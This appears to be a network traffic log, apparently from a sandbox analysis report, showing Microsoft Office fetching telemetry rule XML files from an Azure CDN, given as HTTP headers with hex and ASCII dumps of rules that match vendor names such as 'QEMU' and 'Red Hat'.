                                                                                                                                                                                              2024-11-24 12:39:42 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:42 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 416
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                              x-ms-request-id: 93d7ba64-801e-002a-7fce-3b31dc000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123942Z-15b8b599d882l6clhC1TEBxd5c000000047g00000000fxhp
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:42 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              77192.168.2.64979413.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:42 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:42 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 408
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB9B6040B"
                                                                                                                                                                                              x-ms-request-id: 6e54758c-301e-0020-321b-3d6299000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123942Z-178bfbc474bv7whqhC1NYC1fg4000000060g0000000053y1
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:42 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              78192.168.2.64980113.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:44 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:44 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 432
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                              ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                              x-ms-request-id: 23cbbb45-601e-0084-4e3d-3c6b3f000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123944Z-15b8b599d882l6clhC1TEBxd5c00000004d0000000003q7v
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:44 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              79192.168.2.64980013.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:44 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:44 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                              ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                              x-ms-request-id: 171aa64f-101e-005a-5b63-3b882b000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123944Z-178bfbc474bscnbchC1NYCe7eg0000000660000000002wns
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:45 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              80192.168.2.64980213.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:44 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:45 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:45 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 475
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                              ETag: "0x8DC582BBA740822"
                                                                                                                                                                                              x-ms-request-id: 925146da-101e-0034-3f87-3b96ff000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123945Z-174c587ffdf59vqchC1TEByk6800000004m00000000090r8
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:45 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              81192.168.2.64980313.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:44 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:45 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 427
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                              ETag: "0x8DC582BB464F255"
                                                                                                                                                                                              x-ms-request-id: f5c58262-401e-00ac-04df-3d0a97000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123945Z-178bfbc474bbcwv4hC1NYCypys00000005wg0000000038ks
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:45 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              82192.168.2.64980413.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:44 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:45 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 474
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                              ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                              x-ms-request-id: 3aa21312-901e-0016-730f-3defe9000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123945Z-178bfbc474bpscmfhC1NYCfc2c00000004e000000000dy1f
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:45 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              83192.168.2.64980823.218.208.109443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:45 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                                                              2024-11-24 12:39:46 UTC479INHTTP/1.1 200 OK
                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                              Server: Kestrel
                                                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                              X-Ms-Region: prod-eus-z1
                                                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                              X-OSID: 2
                                                                                                                                                                                              X-CID: 2
                                                                                                                                                                                              X-CCC: GB
                                                                                                                                                                                              Cache-Control: public, max-age=161625
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:46 GMT
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              X-CID: 2


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              84192.168.2.64980913.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:46 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:47 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                              ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                              x-ms-request-id: 4e89b2fa-a01e-006f-563a-3c13cd000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123947Z-15b8b599d885ffrhhC1TEBtuv000000004m0000000001mp6
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:47 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              85192.168.2.64981013.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:46 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:47 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                              ETag: "0x8DC582B984BF177"
                                                                                                                                                                                              x-ms-request-id: 00c17fdd-701e-000d-2f70-3c6de3000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123947Z-174c587ffdfb5q56hC1TEB04kg00000004f00000000010hh
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:47 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              86192.168.2.64981213.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:46 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:47 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
